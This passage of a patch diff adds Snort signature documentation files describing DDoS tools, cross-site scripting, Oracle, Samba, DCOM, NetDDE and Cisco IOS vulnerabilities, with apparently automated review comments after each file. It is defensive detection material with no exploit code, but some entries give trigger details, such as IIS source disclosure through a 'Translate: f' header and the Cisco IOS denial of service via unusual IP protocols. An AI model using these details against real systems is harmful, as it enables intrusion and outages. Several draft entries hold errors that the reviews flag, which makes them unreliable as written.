+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/3223
+
+--
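Review bot: the Sid field says 1283 but the file is named 970.txt; these documents are looked up by sid, so one of the two is wrong and must be corrected before the patch lands. Summary names only the affected services ("WWW Publishing Service and IIS Administration") and leaves the product (Outlook Web Access on Exchange Server) to Detailed Information; name it in Summary so the alert can be triaged at a glance. Fix "characcters", and add the colon to the "Bugtraq" reference label.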
--- /dev/null
+++ b/doc/signatures/249.txt
@@ -0,0 +1,58 @@
+Rule:
+--
+Sid:
+249
+
+--
+Summary:
+The event is generated when a DDoS mstream client makes contact with an mstream handler.
+
+--
+Impact:
+Severe. If the listed source IP is in your network, it is possibly an mstream client.  If the listed destination IP is in your network, it is possibly an mstream handler.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.At the highest level, clients communicate with handlers to inform them to launch attacks.  A client may contact a handler using a TCP SYN packet to destination port 15104.   
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes an mstream handler, the client will attempt to communicate with the handler.
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+A legitimate server port of 15104 will cause this rule to fire.  This rule may also generate a false positive if port 15104 is selected as an FTP data port.
+
+--
+False Negatives:
+There are other known client-to-handler ports in addition to 15104.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet filtering-firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
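Review bot: "Rule:" is immediately followed by "--" without the blank line every other file has. "The event is generated" should read "This event is generated". In Detailed Information, "attack.At the highest level" is missing a space, and the paragraph ends with trailing whitespace. "packet filtering-firewall" has the hyphen in the wrong place; 251.txt in this same patch writes "packet-filtering firewall". The False Positives note about port 15104 being chosen as an FTP data port is a useful, concrete caveat; keep it.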
--- /dev/null
+++ b/doc/signatures/100000650.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000650
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "email" parameter in the "index.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
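Review bot: the Impact section overstates a reflected cross-site scripting issue. "system integrity compromise... Possible execution of arbitrary code of the attackers choosing" is the generic CGI boilerplate; 2326.txt in this patch has the accurate XSS wording (attacks target the site's users, who may have cookies or session credentials stolen and be impersonated), so reuse it here. Likewise the second paragraph of Detailed Information claims the attacker may "execute system binaries", which injection through the "email" parameter into a page does not provide; limit it to what XSS gives. Also add the blank line before the "--" separators after Sid, Affected Systems and Contributors, fix "attackers choosing", and drop the trailing blank line at the end of the file.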
--- /dev/null
+++ b/doc/signatures/2910.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2910
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
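Review bot: a hard line break in Detailed Information leaves the sentence-ending period on its own line ("vulnerability in the procedure refresh_snapshot_repgroup" / ". This procedure is included in"); join these into one sentence. Affected Systems reads "Oracle Oracle9i" with the vendor name duplicated. The comparable Oracle document 2613.txt states that exploitation requires a valid database login; if that holds for refresh_snapshot_repgroup too, say so in Attack Scenarios and qualify Ease of Attack accordingly rather than leaving a bare "Simple." Additional References is empty for a named vendor vulnerability, and several "-- " separators and the "Rule: " / "Sid: " lines carry trailing spaces.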
--- /dev/null
+++ b/doc/signatures/2672.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+2672
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+sresult.exe.
+
+-- 
+Impact: 
+Possible cross site scripting.
+
+--
+Detailed Information:
+The executable file sresult.exe does not properly sanitize user input,
+as a result it may be possible for an attacker to leverage the binary in
+a cross site scripting attack.
+
+--
+Affected Systems:
+	Webcam Corp Webcam Watchdog 4.0.1 a
+
+--
+Attack Scenarios: 
+An attacker can leverage the sresult.exe binary in a cross site
+scripting attack.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script sresult.exe
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
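Review bot: Corrective Action says "Uninstall the script sresult.exe" while Detailed Information calls it "The executable file" and "the binary"; use one term. The second corrective item, "Only allow usage from authenticated users", does not mitigate cross-site scripting, since the injected script runs in the browser of a user who is already authenticated; either drop it or say what it is meant to prevent. Detailed Information is a comma splice ("does not properly sanitize user input, as a result it may be possible"). Impact "Possible cross site scripting." names the technique, not the consequence; state what the attacker gains, as 2326.txt does. Affected Systems "4.0.1 a" looks like a mis-split version string. Additional References is empty.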
--- /dev/null
+++ b/doc/signatures/251.txt
@@ -0,0 +1,69 @@
+Rule:
+--
+Sid:
+238
+
+--
+Summary:
+This event is generated when a command is sent to a Tribal Flood Network
+(TFN) Distributed Denial of Service (DDoS) daemon.
+
+--
+Impact:
+Attempted DDoS.  If the listed source IP is in your network, it may be a
+TFN client.  If the listed destination IP is in your network, it may be 
+a TFN daemon.
+
+--
+Detailed Information:
+The TFN DDoS uses a tiered structure of compromised hosts to coordinate 
+and participate in a distributed denial of service attack. Clients 
+communicate with daemons to inform them to launch attacks.
+
+This event is indicative of a client sending commands to a daemon.
+
+--
+Affected Systems:
+Any TFN compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a TFN daemon, it will respond to client requests.
+
+--
+Ease of Attack:
+Simple. TFN code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+Arachnids:
+http://www.whitehats.com/info/IDS183
+
+--
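Review bot: the Sid field says 238 but the file is named 251.txt; as with 970.txt in this patch, the filename and sid must agree because the documents are looked up by sid. "Rule:" is followed directly by "--" without the blank line used elsewhere. "The TFN DDoS uses a tiered structure" is missing its noun ("The TFN DDoS tool uses..."). The Impact wording that tells the analyst how to interpret source versus destination address is good and could be mirrored in the other DDoS documents (243.txt) for consistency.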
--- /dev/null
+++ b/doc/signatures/3040.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3040
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
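Review bot: two errors in the Detailed Information paragraph: "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing the space after the full stop. This document describes a specific Samba 3.0.8-and-prior integer overflow yet leaves Additional References empty; the vendor advisory for the issue should be listed so a reader can confirm the affected range and the fix. "Apply the appropriate vendor supplied patch" and both "None Known" lines also lack terminating full stops, unlike the rest of the patch.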
--- /dev/null
+++ b/doc/signatures/2613.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2613
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "revoke_surrogate_repcate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "userid" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
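Review bot: the procedure name "revoke_surrogate_repcate" in Detailed Information looks misspelt; the other Oracle documents in this patch refer to the replication packages as sys.dbms_repcat_conf and sys.dbms_repcat_sna, so the suffix here should be checked against the real DBMS_REPCAT procedure name before this ships. The sentence telling Windows users to set $ORACLE_PORTS to "any" is rule-configuration guidance, not a description of the vulnerability, and belongs under Corrective Action or a separate configuration note. Also "in a Oracle database" should read "in an Oracle database", and Attack Scenarios names a "userid" variable while Detailed Information only says "a parameter"; use the same term in both.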
--- /dev/null
+++ b/doc/signatures/1042.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1042
+
+--
+Summary:
+This event is generated when an attempt is made to craft a URL
+containing the text 'Translate: f' in an attempt to view file source code.
+
+--
+Impact:
+Intelligence gathering.  This attack may permit disclosure of the source
+code of files not normally available for viewing.
+
+--
+Detailed Information:
+Microsoft Internet Information Services (IIS) 5.0 contains scripting
+engines to support various advanced files types such as .ASP and .HTR
+files.  This permits the execution of server-side processing.  IIS
+determines which scripting engine is appropriate to use depending on the
+file extension.  If an attacker crafts a URL request ending in
+'Translate: f' and followed by a slash '/', IIS fails to send the file
+to the appropriate scripting engine for processing.  Instead, it returns
+the source code of the referenced file to the browser.
+
+--
+Affected Systems:
+	Microsoft IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can craft a URL to include the 'Translate: f' and followed
+by a '/' to disclose source code on the vulnerable server. 
+
+--
+Ease of Attack:
+Simple.  Attack scripts are freely available.
+
+--
+False Positives:
+Some Microsoft applications make use of the 'Translate: f' header and
+may cause this rule to generate an event. These include applications that use WebDAV
+for publishing content on a webserver such as Microsoft Outlook Web Access (OWA)
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Original rule writer kinch@visto.com 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+False positive information contributed by Javier Fernandez-Sanguino
+
+--
+Additional References:
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
+
+--
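Review bot: the Summary and Detailed Information describe "Translate: f" as text inside the URL ("craft a URL containing the text", "a URL request ending in 'Translate: f' and followed by a slash"), but the False Positives section calls it "the 'Translate: f' header". The two descriptions cannot both be right; the Summary and Detailed Information should be reworded so that the request carries a Translate: f header and the resource path ends in a slash, otherwise readers will look for the string in the wrong part of the request. The False Positives paragraph is also missing its terminating full stop, and "Original rule writer kinch@visto.com" has trailing whitespace.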
--- /dev/null
+++ b/doc/signatures/3450.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3450
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
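Review bot: "false postives from occuring" (in the Summary and repeated verbatim in Detailed Information) misspells both "positives" and "occurring". Because this rule never generates an event and exists only to support other rules, the document should also name the rules that depend on it, so that an operator tuning the ruleset does not disable it as noise.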
--- /dev/null
+++ b/doc/signatures/3210.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3210
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
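Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not match the vulnerability described in the Summary and Detailed Information, which is a malformed DCOM request delivered over RPC; the scenario looks copied from another document and should describe a malformed RPC request to the DCOM interface. "Expoit code exists." in Ease of Attack should be "Exploit code exists.", and Additional References is empty for a vulnerability that has a vendor bulletin; it should be cited.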
--- /dev/null
+++ b/doc/signatures/1825.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1825
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
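Review bot: "running ona web server" in Detailed Information should be "running on a web server". The Summary refers to "a known vulnerability", but nothing in the document identifies which CGI application or resource the rule matches; the same generic text appears in 825.txt and 823.txt in this patch, so an analyst cannot tell the three events apart from the documentation alone. The matched script or path should be named here.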
--- /dev/null
+++ b/doc/signatures/2969.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2969
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
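Review bot: the Impact line "Serious. Execution of arbitrary code with system level privileges" and the Corrective Action line "Apply the appropriate vendor supplied patches" are missing terminating full stops. Affected Systems lists Windows 98 and ME alongside the NT-based versions; since Detailed Information says the service is not started by default, it would help to state for which of the listed versions the referenced bulletin actually applies.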
--- /dev/null
+++ b/doc/signatures/2187.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2187
+
+--
+Summary:
+This event is generated when a suspicious packet using an unusual 
+protocol is sent to a router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in multiple Cisco IOS versions such that a Denial
+of Service condition can be issued against a device by sending multiple 
+packets using IP protocols 53, 55, 77 and 103 directly to that device.
+
+Cisco IOS processes these packets and under certain circumstances, can 
+be made to incorrectly flag an input interface as being full.
+
+--
+Affected Systems:
+Multiple versions of Cisco IOS.
+
+--
+Attack Scenarios:
+An attacker may send a large number of IP packets using one of the 
+protocols 53, 55, 77 or 103 directly to a router. Exploit code exists.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
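Review bot: "Expoit code exists." in Ease of Attack should be "Exploit code exists.", and the same sentence already closes Attack Scenarios, so one copy can go. The Summary says only "an unusual protocol" while Detailed Information names IP protocols 53, 55, 77 and 103; repeating the protocol numbers in the Summary makes the event easier to triage. Additional References is empty for a Cisco IOS vulnerability that has a vendor advisory, and there is a stray double blank line before the closing separator.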
--- /dev/null
+++ b/doc/signatures/1504.txt
@@ -0,0 +1,53 @@
+Rule:  
+
+--
+Sid:
+1504
+
+--
+Summary:
+This event is generated when an attempt is made to access AFS from a source outside the protected network.
+
+--
+Impact:
+Serious. Unauthorized file access.
+
+--
+Detailed Information:
+The Andrew File System (AFS) is a popular networked file system much like NFS, it is often used in the enterprise or by educational institutions. 
+
+AFS utilises an Access Control List (ACL) to determine which hosts or networks are allowed to connect to the resources in the system. Misconfigured ACLs may allow an attacker to gain critical information.
+
+--
+Attack Scenarios:
+Badly configured ACL's allow an attacker that has access to the AFS service to read critical files and even upload files.
+
+--
+Ease of Attack:
+Simple. No exploit code is needed.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Use a packet filtering firewall to prevent unknown hosts from accessing the AFS service
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
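Review bot: this document has no "Affected Systems" section between Detailed Information and Attack Scenarios, which every other document in the patch provides; add it (the Summary implies "All systems running AFS"). The first sentence of Detailed Information is a run-on ("much like NFS, it is often used"); split it after "NFS". "ACL's" should be "ACLs", the Corrective Action sentence lacks a full stop, and there is a double blank line before the closing separator.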
--- /dev/null
+++ b/doc/signatures/825.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+825
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
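Review bot: "running ona web server" should be "running on a web server". The body is word-for-word identical to 1825.txt and 823.txt in this patch; without naming the CGI application or path the rule matches, the three documents give an analyst nothing to distinguish one alert from another.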
--- /dev/null
+++ b/doc/signatures/984.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+984
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2454.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2454
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running has successfully logged on to a Yahoo IM conference.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+A Yahoo IM conference allows multiple users to participate in the exchange of text and voice messages, as well as share files and webcams.  It is possible that a file that is exchanged may contain malicious code such as as virus, worm, Trojan, or backdoor.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+A Yahoo IM user may unwittingly accept a malicious file.
+
+--
+Ease of Attack:
+Easy to transfer a malicious file.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
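Review bot: "such as as virus" in Detailed Information should be "such as a virus". Formatting differs from the template: the Contributors block lacks the blank line before its closing separator and Additional References lacks the blank line after its heading. The False Negatives note that Yahoo IM may use non-default ports is useful; stating which ports the rule expects would let an operator adjust the port variable rather than guess.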
--- /dev/null
+++ b/doc/signatures/823.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+823
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
